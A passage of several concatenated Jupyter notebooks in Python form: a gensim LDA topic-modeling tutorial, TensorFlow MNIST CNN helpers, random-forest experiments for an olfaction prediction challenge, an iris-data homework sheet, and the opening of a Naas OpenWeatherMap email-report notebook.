default to a symmetric # | 1.0/num_topics prior. # | # | `alpha` can be set to an explicit array = prior of your choice. It also # | support special values of 'asymmetric' and 'auto': the former uses a fixed # | normalized asymmetric 1.0/topicno prior, the latter learns an asymmetric # | prior directly from your data. # | # | `eta` can be a scalar for a symmetric prior over topic/word # | distributions, or a matrix of shape num_topics x num_words, # | which can be used to impose asymmetric priors over the word # | distribution on a per-topic basis. This may be useful if you # | want to seed certain topics with particular words by boosting # | the priors for those words. # ``` # # So, now you know how to define the number of topics and the number of sampling iterations as well. A higher number of iterations will probably yield a better model, but also increases processing time. `alpha`, `eta` and `random_state` are so-called *hyperparameters*. They influence the model's performance, so feel free to play around with them. In the present example, we will leave the default values. Furthermore, there exist various methods for hyperparameter optimization, e.g. gridsearch or Gaussian optimization. # # **Warning: This step can take quite a while!** Meaning something between some seconds and some hours depending on corpus size and the number of iterations. Our example corpus should be done within a minute or two at `iterations=1000`. # + # %%time model = LdaMulticore(corpus=gensim_corpus, id2word=type2id, num_topics=10, passes=10, iterations=1000) # - # ### 2.3. Create document-topic matrix # # The generated model object can now be translated into a human-readable document-topic matrix (that is a actually a pandas data frame) that constitutes our principle exchange format for topic modeling results. For generating the matrix from a Gensim model, we can use the following function: topics = postprocessing.show_topics(model=model) topics # ## 3. Model visualization # Each topic has a certain probability for each document in the corpus (have a look at the cell below). This probability distributions are visualized in an interactive **heatmap** (the darker the color, the higher the probability) which displays the kind of information # that is presumably most useful to literary scholars. Going beyond pure exploration, this visualization can be used to show thematic developments over a set of texts as well as a single text, akin to a dynamic topic model. What might become # apparent here, is that some topics correlate highly with a specific author or group of authors, while other topics correlate highly with a specific text or group of texts. document_topics = postprocessing.show_document_topics(topics=topics, model=model, document_labels=meta['title'], doc2bow=gensim_corpus) document_topics[:5] # ### 3.1. Distribution of topics # #### Distribution of topics over all documents # # The distribution of topics over all documents can now be visualized in a heat map. from bokeh.io import output_notebook, show output_notebook() # %matplotlib inline PlotDocumentTopics = visualization.PlotDocumentTopics(document_topics) show(PlotDocumentTopics.interactive_heatmap(), notebook_handle=True) # Or a static heatmap: static_heatmap = PlotDocumentTopics.static_heatmap() static_heatmap.show()
notebooks/IntroducingGensim.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + import tensorflow as tf #helper_functions #________________________________________________ def weight_variable(shape): ''' Initialize weights :param shape: shape of weights, e.g. [w, h ,Cin, Cout] where w: width of the filters h: height of the filters Cin: the number of the channels of the filters Cout: the number of filters :return: a tensor variable for weights with initial values ''' initial_W = tf.truncated_normal(shape, stddev=0.1) return tf.Variable(initial_W) def bias_variable(shape): ''' Initialize biases :param shape: shape of biases, e.g. [Cout] where Cout: the number of filters :return: a tensor variable for biases with initial values ''' initial_b = tf.constant(0.1, shape=shape) return tf.Variable(initial_b) def conv2d(x, W): ''' Perform 2-D convolution :param x: input tensor of size [N, W, H, Cin] where N: the number of images W: width of images H: height of images Cin: the number of channels of images :param W: weight tensor [w, h, Cin, Cout] w: width of the filters h: height of the filters Cin: the number of the channels of the filters = the number of channels of images Cout: the number of filters :return: a tensor of features extracted by the filters, a.k.a. the results after convolution ''' h_conv = tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME') return h_conv def max_pool_2x2(x): ''' Perform non-overlapping 2-D maxpooling on 2x2 regions in the input data :param x: input data :return: the results of maxpooling (max-marginalized + downsampling) ''' h_max = tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME') return h_max #counting the total number of parameters in our network def param_counter(): total_parameters = 0 for variable in tf.trainable_variables(): # shape is an array of tf.Dimension shape = variable.get_shape() #print(shape) #print(len(shape)) variable_parameters = 1 for dim in shape: #print(dim) variable_parameters *= dim.value #print(variable_parameters) total_parameters += variable_parameters print("total number of parameters:", total_parameters) def mnist_inference(x_image, y_, keep_prob, nh1, nh2, nh3, num_classes): # first convolutional layer #nh1 = 32 input_channels = 1 with tf.name_scope('conv1'): W_conv1 = tf.get_variable('W_conv1', shape = [5, 5, input_channels, nh1], initializer = tf.contrib.layers.xavier_initializer(), dtype=tf.float32) b_conv1 = bias_variable([nh1]) h_conv1 = conv2d(x_image, W_conv1) + b_conv1 h_bnorm1= tf.contrib.layers.batch_norm(h_conv1, epsilon=1e-5, scope='bn1') h_act1 = tf.nn.relu(h_bnorm1) with tf.name_scope('conv1_output'): h_pool1 = max_pool_2x2(h_act1) # second convolutional layer #nh2 = 64 with tf.name_scope('conv2'): W_conv2 = tf.get_variable('W_conv2', shape = [5, 5, nh1, nh2], initializer = tf.contrib.layers.xavier_initializer(), dtype=tf.float32) b_conv2 = bias_variable([nh2]) h_conv2 = conv2d(h_pool1, W_conv2) + b_conv2 h_bnorm2= tf.contrib.layers.batch_norm(h_conv2, epsilon=1e-5, scope='bn2') h_act2 = tf.nn.relu(h_bnorm2) with tf.name_scope('conv2_output'): h_pool2 = max_pool_2x2(h_act2) # densely connected layer #nh3 = 1024 with tf.name_scope('fc1'): W_fc1 = tf.get_variable('W_fc1', shape = [7 * 7 * nh2, nh3], initializer = tf.contrib.layers.xavier_initializer(), dtype=tf.float32) b_fc1 = bias_variable([nh3]) h_pool2_flat = tf.reshape(h_pool2, [-1, 7 * 7 * nh2]) with tf.name_scope('fc1_output'): h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1) # dropout with tf.name_scope('dropout'): with tf.name_scope('dropout_output'): h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob) # softmax #num_classes = 10 with tf.name_scope('fc2'): W_fc2 = tf.get_variable('W_fc2', shape =[nh3, num_classes], initializer = tf.contrib.layers.xavier_initializer(), dtype=tf.float32) b_fc2 = bias_variable([num_classes]) with tf.name_scope('net_output'): y_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2 #loss function with tf.name_scope('loss'): cross_entropy = tf.reduce_mean( tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y_conv)) #correct_predictions and accuracy with tf.name_scope('predictions'): correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1)) correct_prediction = tf.cast(correct_prediction, tf.float32) with tf.name_scope('accuracy'): accuracy = tf.reduce_mean(correct_prediction) return (y_conv, cross_entropy, correct_prediction, accuracy) # -
mnist_helper_functions.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # ### Preliminaries # + # Show all figures inline. # %matplotlib inline # Add olfaction-prediction to the Python path. import os import sys curr_path = os.getcwd() gerkin_path = os.path.split(curr_path)[0] olfaction_prediction_path = os.path.split(gerkin_path)[0] sys.path.append(olfaction_prediction_path) import opc_python # Import numerical libraries. import numpy as np from matplotlib.pyplot import plot # + # Import generic utility modules I wrote to load the data from the tab-delimited text files and to score predictions. from opc_python.utils import loading, scoring # Import the modules I wrote for actually shaping and fitting the data to the model. from opc_python.gerkin import dream,fit1,params from opc_python.gerkin.fit1 import rfc_cv # - # Load the perceptual descriptors data. perceptual_headers, perceptual_obs_data = loading.load_perceptual_data('training') loading.format_leaderboard_perceptual_data() # Show the perceptual metadata types and perceptual descriptor names. print(perceptual_headers) # Show the metadata and perceptual descriptor values for the first compound. print(perceptual_obs_data[1]) num_descriptors = len(perceptual_headers[6:]) num_subjects = 49 print('There are %d different perceptual descriptors and %d different subjects' % (num_descriptors,num_subjects)) # Load the molecular descriptors data. molecular_headers, molecular_data = loading.load_molecular_data() print("First ten molecular descriptor types are %s" % molecular_headers[:10]) print("First ten descriptor values for the first compound are %s" % molecular_data[0][:10]) total_size = len(set([int(row[0]) for row in molecular_data])) print("We have molecular descriptors for %d unique molecules" % total_size) training_size = len(set([int(row[0]) for row in perceptual_obs_data])) print("We have perceptual data for %d unique molecules" % training_size) remaining_size = total_size - training_size print ("%d are left out for testing in the competition; half of these (%d) are used for the leaderboard." \ % (remaining_size,remaining_size/2)) print("There are %d rows in the perceptual data set (at least one for each subject and molecule)" % len(perceptual_obs_data)) print("%d of these are replicates (same subject and molecules)" % sum([x[2] for x in perceptual_obs_data])) all_CIDs = sorted(loading.get_CIDs('training')+loading.get_CIDs('leaderboard')+loading.get_CIDs('testset')) DATA = '/Users/rgerkin/Dropbox/science/olfaction-prediction/data/' import pandas episuite = pandas.read_table('%s/DREAM_episuite_descriptors.txt' % DATA) episuite.iloc[:,49] = 1*(episuite.iloc[:,49]=='YES ') episuite.iloc[:,49] episuite = episuite.iloc[:,2:].as_matrix() episuite.shape verbal = pandas.read_table('%s/name_features.txt' % DATA, sep='\t', header=None) verbal = verbal.as_matrix()[:,1:] verbal.shape morgan = pandas.read_csv('%s/morgan_sim.csv' % DATA) morgan = morgan.as_matrix()[:,1:] morgan.shape with open('%s/derived/nspdk_r3_d4_unaug.svm' % DATA) as f: nspdk_dict = {} i = 0 while True: x = f.readline() if(len(x)): key_vals = x.split(' ')[1:] for key_val in key_vals: key,val = key_val.split(':') if key in nspdk_dict: nspdk_dict[key][all_CIDs[i]] = val else: nspdk_dict[key] = {all_CIDs[i]:val} i+=1 if i == len(all_CIDs): break else: break nspdk_dict = {key:value for key,value in nspdk_dict.items() if len(value)>1} nspdk = np.zeros((len(all_CIDs),len(nspdk_dict))) for j,(feature,facts) in enumerate(nspdk_dict.items()): for CID,value in facts.items(): i = all_CIDs.index(CID) nspdk[i,j] = value nspdk.shape nspdk_gramian = pandas.read_table('%s/derived/nspdk_r3_d4_unaug_gramian.mtx' % DATA, delimiter=' ', header=None) nspdk_gramian = nspdk_gramian.as_matrix()[:len(all_CIDs),:] nspdk_gramian.shape molecular_data_types = ['dragon','dragon+episuite','dragon+verbal','dragon+morgan', 'dragon+nspdk','dragon+nspdk_gramian','dragon+all'] molecular_data = {mdt:molecular_data.copy() for mdt in molecular_data_types} for i,line in enumerate(molecular_data['dragon']): CID = int(line[0]) index = all_CIDs.index(CID) molecular_data['dragon+episuite'][i] = line + list(episuite[index]) molecular_data['dragon+verbal'][i] = line + list(verbal[index]) molecular_data['dragon+morgan'][i] = line + list(morgan[index]) molecular_data['dragon+nspdk'][i] = line + list(nspdk[index]) molecular_data['dragon+nspdk_gramian'][i] = line + list(nspdk_gramian[index]) molecular_data['dragon+all'][i] = line + list(episuite[index]) + list(morgan[index]) + list(nspdk[index]) + list(nspdk_gramian[index]) # ### Create Molecular Matrix X_training = {mdt:None for mdt in molecular_data_types} X_leaderboard_other = {mdt:None for mdt in molecular_data_types} X_leaderboard_int = {mdt:None for mdt in molecular_data_types} X_testset_other = {mdt:None for mdt in molecular_data_types} X_testset_int = {mdt:None for mdt in molecular_data_types} X_all = {mdt:None for mdt in molecular_data_types} for mdt in molecular_data_types: X_training[mdt],good1,good2,means,stds,imputer = dream.make_X(molecular_data[mdt],"training") X_leaderboard_other[mdt],good1,good2,means,stds,imputer = dream.make_X(molecular_data[mdt],"leaderboard",target_dilution='high',good1=good1,good2=good2,means=means,stds=stds) X_leaderboard_int[mdt],good1,good2,means,stds,imputer = dream.make_X(molecular_data[mdt],"leaderboard",target_dilution=-3,good1=good1,good2=good2,means=means,stds=stds) X_testset_other[mdt],good1,good2,means,stds,imputer = dream.make_X(molecular_data[mdt],"testset",target_dilution='high',good1=good1,good2=good2,means=means,stds=stds) X_testset_int[mdt],good1,good2,means,stds,imputer = dream.make_X(molecular_data[mdt],"testset",target_dilution=-3,good1=good1,good2=good2,means=means,stds=stds) X_all[mdt],good1,good2,means,stds,imputer = dream.make_X(molecular_data[mdt],['training','leaderboard'],good1=good1,good2=good2,means=means,stds=stds) Y_training_imp,imputer = dream.make_Y_obs('training',target_dilution=None,imputer='median') Y_training_mask,imputer = dream.make_Y_obs('training',target_dilution=None,imputer='mask') Y_leaderboard,imputer = dream.make_Y_obs('leaderboard',target_dilution='gold',imputer='mask') Y_leaderboard_noimpute,_ = dream.make_Y_obs('leaderboard',target_dilution='gold',imputer=None) Y_all_imp,imputer = dream.make_Y_obs(['training','leaderboard'],target_dilution=None,imputer='median') Y_all_mask,imputer = dream.make_Y_obs(['training','leaderboard'],target_dilution=None,imputer='mask') Y_all_zero,imputer = dream.make_Y_obs(['training','leaderboard'],target_dilution=None,imputer='zero') import matplotlib.pyplot as plt plt.scatter(Y_all_mask['mean_std'][:,0],Y_all_mask['mean_std'][:,21]) # ### Data preparation # Show the range of values for the molecular and perceptual descriptors. plt.hist(X_training['dragon+all'].ravel()) plt.yscale('log') plt.ylabel('Count') plt.xlabel('Cube root transformed, N(0,1) normalized molecular descriptor values') plt.figure() plt.hist(Y_training_imp['mean_std'][:21].ravel()) plt.yscale('log') plt.ylabel('Count') _ = plt.xlabel('Perceptual descriptor subject-averaged values') # ## Fitting and Generating Submission Files from sklearn.ensemble import RandomForestRegressor,ExtraTreesRegressor from sklearn.cross_validation import ShuffleSplit n_obs = len(Y_training_imp['mean_std']) # How much should subjected be pooled for estimating individual subjects' responses? n_estimators_list = [5,18,50,150] #rfcs = {subject:[None for _ in range(len(n_estimators_list))] for subject in range(1,50)} X = X_all['dragon+all'] Y = Y_all_imp['subject'] for subject in range(1,50): for i,n_estimators in enumerate(n_estimators_list): if i<3: continue print(subject,n_estimators) rfcs[subject][i] = RandomForestRegressor(n_estimators=n_estimators,max_features=None,min_samples_leaf=1, max_depth=None,oob_score=True,n_jobs=-1,random_state=0) rfcs[subject][i].fit(X,Y[subject]) fig,axes = plt.subplots(7,3,sharex=True,sharey=True,figsize=(10,12)) a_list = np.linspace(0.01,0.99,35) for col,ax in enumerate(axes.flat): rs = np.zeros((35,len(n_estimators_list))) x_max = np.zeros(len(n_estimators_list)) y_max = np.zeros(len(n_estimators_list)) for i,n_estimators in enumerate(n_estimators_list): prediction_pooled = np.zeros(rfcs[1][i].oob_prediction_.shape) for subject in range(1,50): prediction = rfcs[subject][i].oob_prediction_ prediction_pooled += prediction prediction_pooled /= subject for j,a in enumerate(a_list): r = 0 denom = 0 for subject in range(1,50): observation = Y[subject][:,col] prediction = rfcs[subject][i].oob_prediction_[:,col] prediction_weighted = a*prediction_pooled[:,col] + (1-a)*prediction r_ = np.corrcoef(prediction_weighted,observation)[0,1] if not np.isnan(r_): r += r_ denom += 1 r /= denom rs[j,i] = r #print(col,rs) ax.plot(a_list,rs[:,i],color=['r','g','b','c'][i]) x_max[i] = a_list[np.argmax(rs[:,i])] y_max[i] = np.amax(rs[:,i]) ax.plot(x_max,y_max,color='k') import pickle with open('/Users/rgerkin/Desktop/rfcs1_oob.pickle','wb') as f: pickle.dump(rfcs,f) rfcs[18][i].__dict__ # When do we want ExtraTrees instead of the usual RandomForest? n_splits = 10 results = np.zeros((42,2,n_splits)) shuffle_split = ShuffleSplit(n_obs,n_splits,test_size=0.2,random_state=0) for col in range(42): rfc = RandomForestRegressor(n_estimators=20,max_features=None,min_samples_leaf=1, max_depth=None,oob_score=False,n_jobs=-1,random_state=0) etc = ExtraTreesRegressor(n_estimators=20,max_features=None,min_samples_leaf=1, max_depth=None,n_jobs=-1,random_state=0) for j,(train,test) in enumerate(shuffle_split): for i,estimator in enumerate([etc,rfc]): X = X_all['dragon+all'] observed = Y_all_mask['mean_std'][:,col] estimator.fit(X[train,:],observed[train]) predicted = estimator.predict(X[test,:]) results[col,i,j] = np.corrcoef(predicted,observed[test])[1,0] means = results[col,:,:].mean(axis=1) sems = results[col,:,:].std(axis=1)/np.sqrt(n_splits) print('Desc. %d: [%.3f +/- %.3f], [%.3f +/- %.3f]' % \ (col,means[0],sems[0],means[1],sems[1])) # Answer: Probably only for intensity. means = results[:,:,:].mean(axis=2) sems = results[:,:,:].std(axis=2)/np.sqrt(n_splits) plt.plot(means[:,0] - means[:,1]) plt.xlabel("Descriptor #") plt.ylabel("ETC - RFC") # How does performance increase with the number of features? n_splits = 3 n_features = [10,33,100,333,1000,3333,13914] results = np.zeros((42,len(n_features),n_splits)) shuffle_split = ShuffleSplit(n_obs,n_splits,test_size=0.2,random_state=0) for col in range(42): for i,max_features in enumerate(n_features): rfc = RandomForestRegressor(n_estimators=100,max_features=max_features,min_samples_leaf=1, max_depth=None,oob_score=False,n_jobs=-1,random_state=0) for j,(train,test) in enumerate(shuffle_split): X = X_all['dragon+all'] observed = Y_all_mask['mean_std'][:,col] rfc.fit(X[train,:],observed[train]) predicted = rfc.predict(X[test,:]) results[col,i,j] = np.corrcoef(predicted,observed[test])[1,0] means = results[col,:,:].mean(axis=1) sems = results[col,:,:].std(axis=1)/np.sqrt(n_splits) print(('Desc. %d:'+len(n_features)*' [%.3f],') % \ tuple([col]+[means[i] for i in range(len(n_features))])) fig,ax = plt.subplots(14,3,sharex=True,sharey=True,figsize=(10,20)) for col in range(42): ax_ = ax[int(col / 3), col % 3] ax_.errorbar(n_features,results[col,:,:].mean(axis=1),results[col,:,:].std(axis=1)/np.sqrt(n_splits)) ax_.set_xlim(5,15000) ax_.set_ylim(0,0.8) ax_.set_yticks(np.linspace(0,0.6,4)) #ax_.set_xticklabels(n_features,rotation=45) ax_.set_xscale('log') ax_.set_title('Feature %d' % col) plt.tight_layout() fig.text(0.5, 0.00, '# features', ha='center') fig.text(0.00, 0.5, 'Correlation', va='center', rotation='vertical') # Does having more samples per leaf or less depth help? n_splits = 12 n_samples_leaf = [1,4,16,64] n_depth = [2,6,15,32,None] #results = np.zeros((42,len(n_samples_leaf),len(n_depth),n_splits)) shuffle_split = ShuffleSplit(n_obs,n_splits,test_size=0.2,random_state=0) for col in range(3,42): for i,min_samples_leaf in enumerate(n_samples_leaf): for j,max_depth in enumerate(n_depth): rfc = RandomForestRegressor(n_estimators=25,max_features=None, min_samples_leaf=min_samples_leaf, max_depth=max_depth,oob_score=False, n_jobs=-1,random_state=0) X = X_all['dragon+all'] Y = Y_all_mask['mean_std'][:,col] for k,(train,test) in enumerate(shuffle_split): observed = Y[test] rfc.fit(X[train,:],Y[train]) predicted = rfc.predict(X[test,:]) results[col,i,j,k] = np.corrcoef(predicted,observed)[1,0] mean = results[col,i,j,:].mean() sem = results[col,i,j,:].std()/np.sqrt(n_splits) print('Feature %d: %s min samples per leaf, %s max depth: %.3f +/- %.3f' % (col,min_samples_leaf,max_depth,mean,sem)) import pickle with open('data.pickle','wb') as f: pickle.dump(results,f) results2[:,0,3] # + results2 = results - np.tile(results[:,0:1,4:5,:],(1,4,5,1)) # Subtract the no max depth, no min sample condition. results2 = results2[:,:,:,:n_splits] # Only 12 splits used. results2 = results2.mean(axis=3) / (results2.std(axis=3)/np.sqrt(n_splits)) results2[np.where(np.isnan(results2))] = 0 fig,axes = plt.subplots(14,3,sharex=True,sharey=True,figsize=(10,20)) for col,ax in enumerate(axes.flat): im = ax.pcolormesh(results2[col,:,:],vmin=-5,vmax=5,cmap='RdBu') ax.set_xticks(np.arange(5)+0.5) ax.set_xticklabels(n_depth) ax.set_yticks(np.arange(4)+0.5) ax.set_yticklabels(n_samples_leaf) ax.set_title('Feature %d' % col) cbar_ax = fig.add_axes([1.05, 0.15, 0.05, 0.7]) cbar_ax.set_xlabel('Z-Score for correlation vs default condition') plt.colorbar(im, cax=cbar_ax) fig.text(0.5, -0.02, 'max_depth', ha='center') fig.text(-0.02, 0.5, 'min_samples_leaf', va='center', rotation='vertical') plt.tight_layout() # - np.where(np.isnan(results2)) import matplotlib.pyplot as plt fig,axes = plt.subplots(14,3,sharex=True,sharey=True,figsize=(10,20)) for col,ax in enumerate(axes.flat): im = ax.pcolormesh(results[col,:,:,:].mean(axis=2)-results[col,:,:,:].mean(axis=2).max(),vmin=-0.3,vmax=0.0,cmap='gray') ax.set_xticks(np.arange(5)+0.5) ax.set_xticklabels(n_depth) ax.set_yticks(np.arange(4)+0.5) ax.set_yticklabels(n_samples_leaf) ax.set_title('Feature %d' % col) cbar_ax = fig.add_axes([1.05, 0.15, 0.05, 0.7]) cbar_ax.set_xlabel('Correlation - \nBest Correlation') plt.colorbar(im, cax=cbar_ax) fig.text(0.5, -0.02, 'max_depth', ha='center') fig.text(-0.02, 0.5, 'min_samples_leaf', va='center', rotation='vertical') plt.tight_layout() # Now we focus just on max_depth? n_splits = 10 n_depth = [2,5,8,12,16,25,None] results = np.zeros((42,len(n_depth),n_splits)) shuffle_split = ShuffleSplit(n_obs,n_splits,test_size=0.2,random_state=0) for col in range(42): for j,max_depth in enumerate(n_depth): rfc = RandomForestRegressor(n_estimators=10,max_features=None, min_samples_leaf=1, max_depth=max_depth,oob_score=False, n_jobs=-1,random_state=0) X = X_all['dragon+all'] Y = Y_all_mask['mean_std'][:,col] for k,(train,test) in enumerate(shuffle_split): observed = Y[test] rfc.fit(X[train,:],Y[train]) predicted = rfc.predict(X[test,:]) results[col,j,k] = np.corrcoef(predicted,observed)[1,0] means = results[col,:,:].mean(axis=1) sems = results[col,:,:].std(axis=1)/np.sqrt(n_splits) print(('Desc. %d:'+len(n_depth)*' [%.3f],') % \ tuple([col]+[means[i] for i in range(len(n_depth))])) # Visualizing the dependence on n_depth plt.figure(figsize=(9,7)) plt.pcolormesh(results.mean(axis=2) - np.tile(results.mean(axis=2).max(axis=1),(7,1)).T, vmin=-0.2, vmax=0.0) plt.xticks(np.arange(len(n_depth))+0.5,n_depth) plt.yticks(np.arange(42)+0.5,np.arange(42)) plt.ylim(0,42) plt.ylabel('Feature #') plt.set_cmap('gray') ax = plt.colorbar() ax.set_label('Correlation - \nBest Correlation') plt.figure() n_depth_ = [_ if _ is not None else 100 for _ in n_depth] plt.plot(n_depth_,results[:,:,:].mean(axis=2).T) plt.xscale('log') plt.xlabel('Max Features') plt.ylabel('Correlation') _ = plt.xlim(2,100) # + def f_transformation(x, k0=1.0, k1=1.0): return 100*(k0*(x/100)**(k1*0.5) - k0*(x/100)**(k1*2)) def sse(x, mean, stdev): predicted_stdev = f_transformation(mean, k0=x[0], k1=x[1]) #predicted_mean = f_transformation2(predicted[i], k0=x[0], k1=x[1], k2=x[2]) sse = np.sum((predicted_stdev - stdev)**2) return sse fig,axes = plt.subplots(7,3,figsize=(7,12)) ax = axes.flat f_coefs = {col:None for col in range(21)} from scipy.optimize import minimize for col in range(len(ax)): Y_mean = Y_all_mask['mean_std'][:,col] Y_stdev = Y_all_mask['mean_std'][:,col+21] x = [1.0,1.0] res = minimize(sse, x, args=(Y_mean,Y_stdev), method='L-BFGS-B') print(col,res.x) f_coefs[col] = res.x ax[col].scatter(Y_mean,Y_stdev,s=0.1) x_ = np.linspace(0,100,100) ax[col].plot(x_,f_transformation(x_, k0=res.x[0], k1=res.x[1]))#, k2=res.x[2])) # + # Balance between directly fitting stdev and applying a function to the fit of the mean. n_splits = 10 shuffle_split = ShuffleSplit(n_obs,n_splits,test_size=0.2,random_state=0) #predictions_mean = {i:[None]*n_splits for i in range(21)} #predictions_stdev = {i:[None]*n_splits for i in range(21)} for col in range(21): X = X_all['dragon+all'] Y_mean = Y_all_mask['mean_std'][:,col] Y_stdev = Y_all_mask['mean_std'][:,col+21] for k,(train,test) in enumerate(shuffle_split): print(col,k) rfc_mean = RandomForestRegressor(n_estimators=30,max_features=None, min_samples_leaf=1, max_depth=None, n_jobs=-1,random_state=0) rfc_stdev = RandomForestRegressor(n_estimators=30,max_features=None, min_samples_leaf=1, max_depth=None, n_jobs=-1,random_state=0) rfc_mean.fit(X[train,:],Y_mean[train]) rfc_stdev.fit(X[train,:],Y_stdev[train]) predictions_mean[col][k] = rfc_mean.predict(X[test,:]) predictions_stdev[col][k] = rfc_stdev.predict(X[test,:]) # + # Balance between directly fitting stdev and applying a function to the fit of the mean. results = np.zeros((21,n_splits,35)) #predictions_mean = {i:[None]*n_splits for i in range(21)} #predictions_stdev = {i:[None]*n_splits for i in range(21)} for col in range(21): X = X_all['dragon+all'] Y_mean = Y_all_mask['mean_std'][:,col] Y_stdev = Y_all_mask['mean_std'][:,col+21] for k,(train,test) in enumerate(shuffle_split): observed = Y_stdev[test] p_m = predictions_mean[col][k] p_s = predictions_stdev[col][k] for i,a in enumerate(np.linspace(0,1,35)): p_s_transformed = f_transformation(p_m, k0=f_coefs[col][0], k1=f_coefs[col][0]) predicted = a*p_s_transformed + (1-a)*p_s results[col,k,i] = np.corrcoef(predicted,observed)[1,0] plt.pcolormesh(np.linspace(0,1,35),np.arange(21),results.mean(axis=1))# - np.tile(results.mean(axis=1).max(axis=1),(35,1)).T) plt.xlabel('Weight given to transformation of the mean') plt.ylabel('Feature #') plt.colorbar() plt.figure() plt.plot(np.linspace(0,1,35),results.mean(axis=1).T-results.mean(axis=1)[:,0]) plt.xlabel('Weight given to transformation of the mean') for col in range(21): max_loc = np.argmax(results.mean(axis=1)[col,:]) print(col,np.linspace(0,1,35)[max_loc]) # + write = True # Set to True to actually generate the prediction files. n_estimators = 1000 # Set this to a high number (e.g. 1000) to get a good fit. # Best parameters, determined independently. max_features = {'int':{'mean':None,'sigma':None}, 'ple':{'mean':None,'sigma':None}, 'dec':{'mean':None,'sigma':None}} min_samples_leaf = {'int':{'mean':1,'sigma':4}, 'ple':{'mean':1,'sigma':1}, 'dec':{'mean':1,'sigma':1}} max_depth = {'int':{'mean':None,'sigma':2}, 'ple':{'mean':10,'sigma':10}, 'dec':{'mean':10,'sigma':10}} et = {'int':{'mean':True,'sigma':True}, 'ple':{'mean':False,'sigma':False}, 'dec':{'mean':False,'sigma':False}} #et['int'] = {'mean':False,'sigma':False} # Uncomment to get a correct score estimate, or leave commented to get best fit. use_mask = {'int':{'mean':False,'sigma':True}, 'ple':{'mean':False,'sigma':True}, 'dec':{'mean':False,'sigma':True}} # - for mdt in molecular_data_types: print(mdt) loading.make_prediction_files(rfcs_leaderboard[mdt],X_leaderboard_int[mdt],X_leaderboard_other[mdt], 'leaderboard_%s' % mdt,2,Y_test=Y_leaderboard_noimpute,write=False) rs_ = [[0.658,0.517,0.522,0.385,0.244,0.479],[0.665,0.509,0.535,0.372,0.238,0.487],[0.662,0.498,0.506,0.260,0.274,0.468], [0.650,0.532,0.535,0.330,0.272,0.492],[0.684,0.577,0.551,0.447,0.256,0.500],[0.655,0.551,0.535,0.269,0.311,0.486]] for i,challenge in enumerate(rs_): print(molecular_data_types[i]+'\t'.join(str(x) for x in challenge)) rfcs,score,rs = fit2.rfc_final(X_all,Y_all_imp['mean_std'],Y_all_mask['mean_std'], max_features,min_samples_leaf,max_depth,et,use_mask, n_estimators=n_estimators) loading.make_prediction_files(rfcs,X_testset_int,X_testset_other,'testset',2,write=False)
opc_python/gerkin/challenge1_collaborative.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: frontiers-env # language: python # name: frontiers-env # --- # Note: Parts of this homework might be quite challenging as it may not be obvious how to even search for a possible solution. Feel free to collaborate with your classmates to solve these questions. # **1**. Using `requests`, read text from from # # `https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.names` # # and write a regular expression using `re` that returns the following list # # ```python # ['sepal length in cm', # 'sepal width in cm', # 'petal length in cm', # 'petal width in cm', # 'class'] # ``` # **2**. Using `pandas`, create a DataFrame which looks like the image below (but with all rows) from # # `https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data'` # # and the columns variable created in the last question. # # <img src="ex4_q2.png" alt="df" width="400"/> # **3**. Modify the DataFrame so that `iris` is in a column called `genus` and `setosa` etc is in a column named `species` and remove the `class` column. # **4**. Using `seaborn`, generate this plot from the DataFrame created in Q3. # # <img src="ex4_q4.png" alt="plot" width="400"/> # **5**. Using `joypy`, create the following plot from the `iris` DataFrame from Q2. You may have to pip install `joypy` first. # # <img src="ex4_q5.png" alt="plot" width="400"/>
exercises/Exercises_04.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + [markdown] papermill={} tags=[] # <img width="10%" alt="Naas" src="https://landen.imgix.net/jtci2pxwjczr/assets/5ice39g4.png?w=160"/> # + [markdown] papermill={} tags=[] # # OpenWeatherMap - Send daily email with predictions # <a href="https://app.naas.ai/user-redirect/naas/downloader?url=https://raw.githubusercontent.com/jupyter-naas/awesome-notebooks/master/OpenWeatherMap/OpenWeatherMap_Send_daily_email_with_predictions.ipynb" target="_parent"><img src="https://naasai-public.s3.eu-west-3.amazonaws.com/open_in_naas.svg"/></a> # + [markdown] papermill={} tags=[] # **Tags:** #openweathermap #weather #plotly #prediction #email #naas_drivers #automation #opendata #analytics #ai #image #html #text # + [markdown] papermill={} tags=[] # **Author:** [<NAME>](https://www.linkedin.com/in/gautier-vivard-1811b877/) # + [markdown] papermill={} tags=[] # ## Input # + [markdown] papermill={} tags=[] # ### Import libraries # + papermill={} tags=[] import requests import markdown2 import time import pandas as pd import naas from naas_drivers import plotly, prediction # + [markdown] papermill={} tags=[] # ### Setup your open weather info # + papermill={} tags=[] OPENWEATHER_KEY = '***************' # get your key from here https://home.openweathermap.org/api_keys (it takes couples of minutes) city = 'rouen' country_code = 'fr' # if you don't want to specify a country code, let '' # + papermill={} tags=[] # Output paths image and html output_image = f'{city}.png' output_html = f'{city}.html' # + [markdown] papermill={} tags=[] # ### Input email parameter # + papermill={} tags=[] email_to = ["<EMAIL>"] email_from = None subject = f'{city} predictions as of today' # + [markdown] papermill={} tags=[] # ### Schedule every day # + papermill={} tags=[] # naas.scheduler.add(cron='0 8 * * *') # naas.scheduler.delete() # + [markdown] papermill={} tags=[] # ### Create markdown template # + papermill={} tags=[] # %%writefile message.md Hey The *CITY* temperature on the last 5 days In +2 days, basic ML models predict the following temperature: - *linear*: LINEAR <img href=link_html target="_blank" 